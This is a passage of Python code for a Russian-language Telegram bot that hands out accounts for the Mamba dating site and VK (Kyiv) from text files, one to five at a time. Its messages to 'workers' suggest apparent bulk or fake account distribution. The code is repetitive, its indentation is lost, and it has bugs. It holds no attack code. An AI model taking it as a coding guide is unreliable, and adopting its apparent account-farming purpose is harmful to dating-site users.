user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Три мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Четыре мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
mambaua3 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2)
bot.send_message(m.chat.id, mambaua3, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (mambaua3)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
elif mambauaresult == '0' :
user_markup.row('На главную')
bot.send_message(message.chat.id, "Не осталось совсем, реально, ждите, пока закинут. \nАкков: " + mambaresult, reply_markup=user_markup)
else :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одна мамба')
user_markup.row('Две мамбы')
user_markup.row('Три мамбы')
user_markup.row('Четыре мамбы')
user_markup.row('Пять мамб')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько нужно? \nВ наличии: " + mambauaresult, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одна мамба")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mambaua)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Две мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mambaua)
bot.send_message(m.chat.id, mambaua1, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Три мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это уже дело)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Четыре мамбы")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
mambaua3 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Это сильно)) \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2)
bot.send_message(m.chat.id, mambaua3, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (mambaua3)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Пять мамб")
def command_text_hi(m):
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
mambaua = uaaccount.pop (0)
del uaaccount[0]
mambaua1 = uaaccount.pop (0)
del uaaccount[0]
mambaua2 = uaaccount.pop (0)
del uaaccount[0]
mambaua3 = uaaccount.pop (0)
del uaaccount[0]
mambaua4 = uaaccount.pop (0)
del uaaccount[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, если ты справишься с ними... \n '+mambaua)
bot.send_message(m.chat.id, mambaua1)
bot.send_message(m.chat.id, mambaua2)
bot.send_message(m.chat.id, mambaua3)
bot.send_message(m.chat.id, mambaua4, reply_markup=user_markup)
print (mambaua)
print (mambaua1)
print (mambaua2)
print (mambaua3)
print (mambaua4)
print (uaaccount)
uamamba = open('mambaua.txt', 'w')
for index in uaaccount:
uamamba.write(index + '\n')
uamamba.close
uamamba = open('mambaua.txt', 'r+')
uaspisok = (uamamba.read())
uaaccount = uaspisok.split('\n')
print (uaaccount)
uamamba.close()
@bot.message_handler(func=lambda message: message.text == "Получить вк Киев")
def handle_text(message):
#orig_vkua = open('vkorigua.txt', 'r+')
rab_vkua = open('vkkiev.txt', 'r+')
vk_list_ua = (rab_vkua.read())
vklist_ua = vk_list_ua.split('\n')
vk_proverka_ua = [x for x in vklist_ua if x != '']
vkuaresultat = str(len(vk_proverka_ua))
print(vkuaresultat)
#ovk_list_ua = (orig_vkua.read())
#ovklist_ua = ovk_list_ua.split('\n')
#vkresult_ua = []
#for index in vk_proverka_ua:
# if index in ovklist_ua:
# vkresult_ua.append(index)
#print(len(vkresult_ua))
#vkuaresultat = str(len(vkresult_ua))
if vkuaresultat == '1':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('3 акка')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "3 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '4' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('3 акка')
user_markup.row('4 акка')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "3 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "4 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev3 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2)
bot.send_message(m.chat.id, vkkiev3, reply_markup=user_markup)
print (vkkiev+" "+vkkiev1+" "+vkkiev2+" "+vkkiev3)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
elif vkuaresultat == '0':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(message.chat.id, "Закончились, совсем. \nАкков: " + vkuaresultat, reply_markup=user_markup)
else:
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('1 акк')
user_markup.row('2 акка')
user_markup.row('3 акка')
user_markup.row('4 акка')
user_markup.row('5 акков')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + vkuaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == '1 акк')
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Лови:) \n' +vkkiev)
bot.send_message(m.chat.id, 'Нужно будет еще что-нибудь - приходи.', reply_markup=user_markup)
print (vkkiev)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "2 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, два так два. Мне не жалко...\n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1,reply_markup=user_markup)
print (vkkiev+' '+vkkiev1)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "3 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'О, мастер своего дела?;) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "4 акка")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev3 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ну, раз так хочешь... \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2)
bot.send_message(m.chat.id, vkkiev3, reply_markup=user_markup)
print (vkkiev+" "+vkkiev1+" "+vkkiev2+" "+vkkiev3)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "5 акков")
def command_text_hi(m):
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
vkkiev = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev1 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev2 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev3 = vkkiev_list.pop (0)
del vkkiev_list[0]
vkkiev4 = vkkiev_list.pop (0)
del vkkiev_list[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Ого, а сравишься?) \n' +vkkiev)
bot.send_message(m.chat.id, vkkiev1)
bot.send_message(m.chat.id, vkkiev2)
bot.send_message(m.chat.id, vkkiev3)
bot.send_message(m.chat.id, vkkiev4, reply_markup=user_markup)
print (vkkiev+' '+vkkiev1+' '+vkkiev2+' '+vkkiev3+' '+vkkiev4)
print (vkkiev_list)
vkkiev = open('vkkiev.txt', 'w')
for index in vkkiev_list:
vkkiev.write(index + '\n')
vkkiev.close
vkkiev = open('vkkiev.txt', 'r+')
svkkiev = (vkkiev.read())
vkkiev_list = svkkiev.split('\n')
print (vkkiev_list)
vkkiev.close()
@bot.message_handler(func=lambda message: message.text == "Получить мамбу МСК")
def handle_text(message):
#orig_mamba = open('mambaorig.txt', 'r+')
rab_mamba = open('mamba.txt', 'r+')
mamba_list = (rab_mamba.read())
mambalist = mamba_list.split('\n')
mambishche = [x for x in mambalist if x != '']
mambaresultat = str(len(mambishche))
print(mambaresultat)
#omambalist = (orig_mamba.read())
#omamba_list = omambalist.split('\n')
#result = []
#for index in mambishche:
# if index in omamba_list:
# result.append(index)
#print(len(result))
#mambaresultat = str(len(result))
#############
if mambaresultat == '1':
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
elif mambaresultat == '2' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
@bot.message_handler(func=lambda message: message.text == "Две")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
mamba1 = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba)
bot.send_message(m.chat.id, mamba1, reply_markup=user_markup)
print (mamba)
print (mamba1)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
elif mambaresultat == '3' :
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('Одну')
user_markup.row('Две')
user_markup.row('Три')
user_markup.row('На главную')
bot.send_message(message.chat.id, "Сколько? \nОстаток: " + mambaresultat, reply_markup=user_markup)
@bot.message_handler(func=lambda message: message.text == "Одну")
def command_text_hi(m):
f = open('mamba.txt', 'r+')
s = (f.read())
a = s.split('\n')
print (a)
f.close()
mamba = a.pop (0)
del a[0]
user_markup = telebot.types.ReplyKeyboardMarkup(True, False)
user_markup.row('На главную')
bot.send_message(m.chat.id, 'Держи: \n '+mamba, reply_markup=user_markup)
bot.send_message(m.chat.id, 'Работай хорошо, тогда у тебя всегда будут свежие и красивые аккаунты;)')
print (mamba)
print (a)
f = open('mamba.txt', 'w')
for index in a:
f.write(index + '\n')
f.close
f = open('mamba.txt', 'r+')
